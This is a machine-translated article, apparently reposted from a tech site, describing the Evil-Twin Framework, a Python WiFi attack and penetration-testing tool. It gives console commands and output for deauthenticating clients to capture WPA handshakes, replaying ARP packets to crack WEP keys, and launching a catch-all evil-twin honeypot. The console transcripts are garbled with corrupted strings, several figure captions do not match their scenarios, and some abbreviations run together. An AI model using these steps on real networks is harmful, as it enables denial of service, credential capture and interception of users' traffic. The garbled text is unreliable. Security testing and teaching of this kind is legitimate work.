Shulou(Shulou.com)06/01 Report--

This article mainly introduces the relevant knowledge of "what is the framework and function of ETF". The editor shows you the operation process through an actual case. The method of operation is simple and fast, and it is practical. I hope this article "what is the framework and function of ETF" can help you solve the problem.

Architecture of ETF

ETF's framework is written in Python because the code in this development language is very easy to read and makes it easy for other developers to contribute code to the project. In addition, many ETF libraries, such as Scapy, are developed for Python and can easily be used with ETF.

The architecture of ETF (figure 1) is divided into different modules that interact with each other. The settings of the framework are written in a separate configuration file. Users can verify and modify these configurations through the user interface in the ConfigurationManager class. Other modules can only read these settings and run according to them.

Figure the framework of 1:Evil-Twin

ETF supports a variety of user interfaces that interact with the framework, and the current default interface is an interactive console interface, similar to that of Metasploit. Graphical user interface (GUI) and command line interface (CLI) for desktop / browser use are being developed, and the mobile interface is also an alternative in the future. Users can use the interactive console interface to modify the settings in the configuration file (eventually using GUI). The user interface can interact with each module that exists in this framework.

The WiFi module (AirCommunicator) is used to support a variety of WiFi functions and attack types. The framework defines three basic pillars of Wi-Fi communication: packet sniffing, custom packet injection, and the creation of access points. The three main WiFi communication modules AirScanner, AirInjector, and AirHost are used for packet sniffing, packet injection, and access point creation, respectively. These three classes are encapsulated in the main WiFi module AirCommunicator, and AirCommunicator reads the configuration files of these services before starting them. Any type of WiFi attack can be constructed using one or more of these core functions.

To use man-in-the-middle (MITM) attacks, a common way to attack WiFi clients, ETF has an integration module called ETFITM (Evil-Twin Framework-in-the-Middle), which is used to create a web proxy to intercept and modify HTTP/HTTPS packets that have passed.

Many other tools can also take advantage of MITM created by ETF. Through its extensibility, ETF can support them without having to call them separately, and you can add these tools to the framework by extending the Spawner class. This allows developers and security auditors to use preconfigured parameter characters in the framework to invoke the program.

Another way to extend ETF is through plug-ins. There are two types of plug-ins: WiFi plug-ins and MITM plug-ins. The MITM plug-in is a script that can be executed while the MITM agent is running. The agent passes HTTP (s) requests and responses to plug-ins that can record and process them. WiFi plug-ins follow a more complex execution process, but still provide a relatively simple API for contributors who want to participate in development and use their own plug-ins. WiFi plug-ins can be further divided into three categories, each of which corresponds to a core WiFi communication module.

Each core module has specific events that trigger the execution of the response plug-in. For example, AirScanner has three defined events that can be programmed to handle its response. Events usually correspond to the setup phase before the service starts running, the intermediate execution phase when the service is running, and the uninstall or cleanup phase after the service is completed. Because Python allows multiple inheritance, a plug-in can inherit multiple plug-in classes.

Figure 1 above is a summary of the framework architecture. The arrow indicated from the ConfigurationManager means that the module reads information from it, and the arrow pointing to it means that the module writes / modifies the configuration.

Example of using ETF

ETF can test the network security of WiFi or the WiFi security awareness of end users in a variety of ways. The following examples describe some of the penetration testing features of the framework, such as access point and client detection, attacking access points using WPA and WEP type protocols, and creating evil twin access points.

These examples are designed using ETF and WiFi cards that allow WiFi data capture. They also use the following abbreviations in the ETF setup command:

APS Access Point SSIDAPB Access Point BSSIDAPC Access Point ChannelCM Client MAC address

In the actual test scenario, make sure you use the correct information to replace these abbreviations.

The packet of the WPA four-way handshake is captured after the authentication attack is released.

This scenario (figure 2) considers two aspects: the possibility of removing authentication attacks and capturing WPA four-way handshake packets. This scenario starts with an WPA/WPA2-enabled access point that has a connected client device (in this case, a smartphone). The goal is to disconnect the network with WiFi through a regular de-authentication attack (LCTT similar to DoS attack), and then capture WPA's handshake packet when the client tries to reconnect. Reconnection is done manually as soon as the connection is disconnected.

Figure 2: scenario in which WPA handshake packets are captured after an authentication attack is released

What needs to be considered in this example is the reliability of ETF. The goal is to confirm that the tool can capture WPA handshake packets all the time. Each tool is used to repeat the scenario multiple times to check their reliability when capturing WPA handshake packets.

There is more than one way to use ETF to capture WPA handshake packets. One way is to use a combination of AirScanner and AirInjector modules; the other is to use only AirInjector. The following scenario uses a combination of two modules.

ETF enables the AirScanner module and analyzes IEEE 802.11 data frames to discover the WPA handshake packet. AirInjecto can then use de-authentication attacks to force clients to disconnect in order to reconnect. The following steps must be performed on ETF to achieve the above goals:

Enter AirScanner configuration mode: config airscanner sets AirScanner non-hop channel: config airscanner sets channel to sniff data passing through WiFi access point channel (APC): set fixed_sniffing_channel = uses the CredentialSniffer plug-in to start the AirScanner module: start airscanner with credentialsniffer adds the target access point's BSSID (APS) from the list of sniffed access points: add aps where ssid = enables the AirInjector module, which by default enables de-authentication attack: start airinjector

These simple command settings allow ETF to perform a successful and effective de-authentication attack at each test. ETF can also capture WPA handshake packets during each test. The following code allows us to see the successful execution of ETF.

█╗██╔════╝╚══██╔══╝██╔════╝█╗ ██║ █╗██╔══╝ ██║ ██╔══╝█╗ ██║ ██║╚═╝ ╚═ ╝ ╚═╝ [+] Do you want to load an older session? [Yapin]: n [+] Creating new temporary session on 02 Creating new temporary session on 2018 [+] Enter the desired session name:ETF [etf/aircommunicator/]:: > config airscannerETF [etf/aircommunicator/airscanner]:: > listargssniffing_interface = wlan1; (var) probes = True; (var) beacons = True; (var) hop_channels = false; (var) fixed_sniffing_channel = 11 (var) ETF [etf/aircommunicator/airscanner]:: > start airscanner witharpreplayer caffelatte credentialsniffer packetlogger selfishwifiETF [etf/aircommunicator/airscanner]:: > start airscanner with credentialsniffer [+] Successfully added credentialsniffer plugin. [+] Starting packet sniffer on interface 'wlan1' [+] Set fixed channel to 11ETF [etf/aircommunicator/airscanner]: > add aps where ssid = CrackWPAETF [etf/aircommunicator/airscanner]:: > start airinjectorETF [etf/aircommunicator/airscanner]:: > [+] Starting deauthentication attack- 1000 bursts Of 1 packets- 1 different packets [+] Injection attacks finished executing. [+] Starting post injection methods [+] Post injection methods finished [+] WPA Handshake found for client'70 Starting post injection methods [+] 3eVOV ACRATOR BBG 78HANG 64 'and network' CrackWPA' use ARP replay attack and crack WEP wireless network

The following scenario (figure 3) will focus on the efficiency of address Resolution Protocol (ARP) replay attacks and the speed at which WEP packets containing initialization vectors (IVs) can be captured. The same network may need to crack different numbers of captured IVs, so the upper limit of IVs for this scenario is 50000. If the network crashes before 50000 IVs is captured during the first test, the actual number of IVs captured will be the new upper limit for the network in the next test. We use aircrack-ng to crack the packet.

The test scenario starts with a WiFi access point encrypted using the WEP protocol and an offline client device that knows its key-12345 is used for testing convenience, but it can be a longer and more complex key. Once the client is connected to the WEP access point, it sends an unnecessary ARP packet; this is the packet to be captured and replayed. Once the number of captured packets containing IVs reaches the set limit, the test is over.

Figure 3: scenario of capturing WPA handshake packet after de-authentication attack

ETF uses Python's Scapy library for packet sniffing and packet injection. To maximize known performance problems in Scapy, ETF has fine-tuned some low-level libraries to greatly speed up package injection. For this particular scenario, ETF uses tcpdump as a background process rather than Scapy,Scapy to identify encrypted ARP packets in order to sniff more efficiently.

This scenario requires the following commands and actions to be performed on ETF:

Enter AirScanner setting mode: config airscanner sets AirScanner non-hop channel: set hop_channels = false sets channel to sniff data passing through access point channel (APC): set fixed_sniffing_channel = enters ARPReplayer plug-in setting mode: config arpreplayer sets BSSID of WEP network target access point (APB): set target_ap_bssid uses ARPReplayer plug-in to start AirScanner module: start airscanner with arpreplayer

After executing these commands, ETF correctly identifies the encrypted ARP packets and then successfully performs an ARP replay attack to destroy the network.

Use an omnipotent honeypot

The scenario in figure 4 creates multiple access points using the same SSID, and for WiFi networks that can be detected but cannot be accessed, this technique can discover the encryption type of the network. By starting multiple access points with all security settings, the client automatically connects access points that match the locally cached access point information.

Figure 4: WPA handshake packet data is captured after the authentication attack is released.

With ETF, you can set up the hostapd configuration file and then start the program in the background. Hostapd supports opening multiple access points by setting virtual interfaces on a single wireless card, and because it supports all types of security settings, it can set up a complete all-around honeypot. For networks that use WEP and WPA (2)-PSK, use the default password, and for networks that use WPA (2)-EAP, configure the accept all policy.

For this scenario, the following commands and actions must be performed on ETF:

Enter APLauncher setting mode: config aplauncher sets the SSID (APS) of the target access point: set ssid = set APLauncher to all received honeypots: set catch_all_honeypot = true start AirHost module: start airhost

Using these commands, ETF can start a complete omnipotent honeypot with all types of security configurations. ETF also automatically starts DHCP and DNS servers, allowing clients to stay connected to the Internet. ETF provides a better, faster and more complete solution to create an omnipotent honeypot. The following code can see the successful execution of ETF.

█╗██╔════╝╚══██╔══╝██╔════╝█╗ ██║ █╗██╔══╝ ██║ ██╔══╝█╗ ██║ ██║╚═╝ ╚═ ╝ ╚═╝ [+] Do you want to load an older session? [YBO]: n [+] Creating ne' Cxzw temporary session on 03trueETF 08 Enter the desired session name:ETF 2018 [etf/aircommunicator/]:: > config aplauncherETF [etf/aircommunicator/airhost/aplauncher]:: > setconf ssid CatchMessid = CatchMeETF [etf/aircommunicator/airhost/aplauncher]:: > setconf catch_all_honeypot truecatch_all_honeypot = trueETF [etf/aircommunicator/airhost/aplauncher]:: > start airhost [+] Killing already started processes and restarting network services [+] Stopping dnsmasq and hostapd services [+] Access Point stopped... [+] Running airhost plugins Pre_start [+] Starting hostapd background process [+] Starting dnsmasq service [+] Running airhost plugins post_start [+] Access Point launched successfully [+] Starting dnsmasq service on "what are the frameworks and functions of ETF"? Thank you for your reading. If you want to know more about the industry, you can follow the industry information channel. The editor will update different knowledge points for you every day.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.